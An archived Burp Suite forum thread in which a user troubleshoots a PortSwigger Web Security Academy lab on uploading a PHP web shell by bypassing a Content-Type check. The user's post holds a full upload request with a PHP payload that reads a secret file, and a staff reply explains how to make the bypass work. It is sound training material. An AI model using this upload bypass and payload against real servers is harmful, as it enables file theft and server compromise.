The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Missing parameter 'csrf' as response to my request to upload php file

Raghuveer | Last updated: Sep 09, 2023 07:04PM UTC

Hi Team, I am trying to solve lab "Web shell upload via Content-Type restriction bypass" I am facing an issue. I am changing the content type to "images/jpeg" and then sending the request to get my php exploit file uploaded but I am seeing 400 bad request with message (Missing parameter 'csrf') Request: POST /my-account/avatar HTTP/2 Host: 0a57005404b8e8a781483042005900bd.web-security-academy.net Cookie: session=p4PrlveuyPUEoAn5Kz7cEjU5QDKC7uH0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: images/jpeg; boundary=---------------------------22869937191357099563482819783 Content-Length: 548 Origin: https://0a57005404b8e8a781483042005900bd.web-security-academy.net Referer: https://0a57005404b8e8a781483042005900bd.web-security-academy.net/my-account Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers -----------------------------22869937191357099563482819783 Content-Disposition: form-data; name="avatar"; filename="exploit.php" Content-Type: application/octet-stream <?php echo file_get_contents('/home/carlos/secret'); ?> -----------------------------22869937191357099563482819783 Content-Disposition: form-data; name="user" wiener -----------------------------22869937191357099563482819783 Content-Disposition: form-data; name="csrf" r5p6ddAhxIgzB7TRb4D3RPLmQYCmiQ9w -----------------------------22869937191357099563482819783-- Response: HTTP/2 400 Bad Request Content-Type: application/json; charset=utf-8 X-Frame-Options: SAMEORIGIN Content-Length: 26 "Missing parameter 'csrf'"

Ben, PortSwigger Agent | Last updated: Sep 11, 2023 11:26AM UTC

Hi Raghuveer, A couple of things here. Firstly, the correct Content-Type is actually image/jpeg (without the 's' on image). Secondly, you want to be changing the Content-Type in the request body (under the WebKitFormBoundary).

Andrew | Last updated: Sep 28, 2024 11:27PM UTC